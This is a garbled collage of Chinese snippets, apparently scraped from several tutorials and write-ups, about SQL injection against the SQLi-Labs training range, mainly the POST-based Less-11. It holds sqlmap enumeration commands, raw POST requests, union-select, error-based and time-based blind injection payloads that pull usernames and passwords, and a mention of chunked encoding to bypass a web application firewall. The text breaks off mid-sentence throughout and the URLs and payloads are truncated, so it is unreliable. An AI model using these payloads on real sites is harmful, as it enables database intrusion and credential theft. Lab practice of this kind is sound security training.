实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 实验步骤 第一步 判断是够存在POST型注入点 (1)访问目标网站的Less-11 (2)在Firefox浏览器中按F12,查浏览器前端表单提交元素可以看到用户名和密码两个参数分别为uname和passwd username,password from users limit 0,1 #&passwd=1 第四步 结合SQLMap软件与Burpsuit的抓包信息进行工具注入 (1)以test/test登录Less
-11/ --forms --batch 查找数据库 python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --dbs --batch 查找当前数据库 python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --current-db -- batch 查找表 python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql --tables --batch 查找表中的列(字段) python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users --columns --batch 查找字段中的数据 python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users
id=1 --cookie 对于POST提交数据的漏洞,需要指定其data参数 sqlmap -u http://127.0.0.1/sql/Less-11/? 1.2查看数据库所有的用户 sqlmap -u http://127.0.0.1/sql/Less-11/? 1725310202.png 1.4查看当前数据库用户 sqlmap -u http://127.0.0.1/sql/Less-11/? id=1 --roles 2197497132.png 1.7查看所有的数据库 sqlmap -u http://127.0.0.1/sql/Less-11/? id=1 --dbs 1715696327.png 1.8查看当前数据库 sqlmap -u http://127.0.0.1/sql/Less-11/?
POST /sqli-labs-master/Less-11/ HTTP/1.1 Host: 192.168.172.161 Content-Length: 128 Cache-Control: max-age apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.172.161/sqli-labs-master/Less 读取数据库名 POST /sqli-labs-master/Less-11/ HTTP/1.1 Host: 192.168.172.161 Content-Length: 251 Cache-Control apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.172.161/sqli-labs-master/Less 3 %28 3 %29 3 %29 3 %2C 1 2 3 %23 1 & 3 sub 3 mit 1 = 3 Sub 3 mit 0 读取表名: POST /sqli-labs-master/Less
database is ' + database) Less-10(GET-Blind-Time based-double quotes) 和Less-9原理一致,只是闭合方式不同,将单引号改为双引号就一样了 Less ) from users--+&passwd=123&submit=Submit Less-12(POST-Error Based-Double quotes-String-with twist) 和Less for the right syntax to use near '"admin"") and password=("") LIMIT 0,1' at line 1 由此可以看出其闭合方式为"),其他和Less
井号注释后面的语句,导致修改密码的时候修改的是admin的密码(4)验证登录admin和你刚才修改的密码⛑️(5)注册顺序4、万能密码登录(1)靶场http://124.222.124.9:8888/Less
information_schema.columns where table_name='users'; 查字段: select username,password from security.users; less information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit 总结: less-1 get less
Less-11 及以上:高级级别的SQL注入练习,包括盲注等。3.2 开始练习选择一个练习级别,点击进入。每个练习页面通常会包含一个表单,模拟用户的输入。 Less-11: SQL 注入,但对单引号、双引号、反斜杠、分号、空格、注释符、括号、数字、字母和特殊字符进行了转义。
文件所在的绝对路径验证过程 : 与-u参数类似判断可注入的参数判断可以用哪种SQL注入技术来注入识别出所有存在的注入类型尝试去判定数据库版本、开发语言、操作系统版本SQLMAP基本使用实例2目标靶机 : SQLi-Labs的less
从指定参数检测 sqlmap --data "uname=1&password=2" -p uname 自动检测表单传入参数 sqlmap -u "http://127.0.0.1/sqlilabs2/Less
id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞 对于是post提交数据的URL,我们需要指定其data参数 "http://192.168.10.1/sqli/Less 我们抓取了一个post提交数据的数据包保存为post.txt,如下,uname参数和passwd参数存在SQL注入漏洞 POST /sqli/Less-11/ HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 38 Referer: http://192.168.10.1/sqli/Less
chunked-coding-converter分块传输绕过安全狗防护 分块传输与Sqlmap联动 python2 sqlmap.py -u "http://192.168.34.1:8090/sqli-labs-php7-master/Less
id=1" --cookie="抓取的cookie" 对于是post提交数据的URL,我们需要指定其data参数 sqlmap -u "http://xxx/sqli/Less-11/?
id=1” -f –banner –dbs –users -f fingerprint 指纹 演示: python sqlmap.py -u “http://192.168.1.2/sqlilabs/Less foobar;id=1” –param-del=”;” -f –banner –dbs –users 演示: python sqlmap.py -u “http://192.168.1.2/sqlilabs/Less python sqlmap.py -u “http://192.168.1.2/sqlilabs/Less-11/” –data=“uname=admin&passwd=admin&submit=Submit
id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞 3、需要Post提交数据的url sqlmap -u "http://127.0.0.1/sqli-labs/Less
substr((select username from users limit 0, 1), 1, 1))=68 ,1 , SLEEP(5) --+ Less-9、Less-10 这两个与 8 类似 Less
less-11 有回显,报错注入。
database(),1,1))>115,1,sleep(5))--+ Less-10 1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+ Less
得到参数如下: uname=admin&passwd=admin&submit=Submit 进行测试: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less 登录dvwa进行配置如下: 得到测试链接 不带cookie进行测试: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php -
发现这样的时间的盲注仍然可行~ 那么结果就同less5了 Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注) 其余同9喽~ Less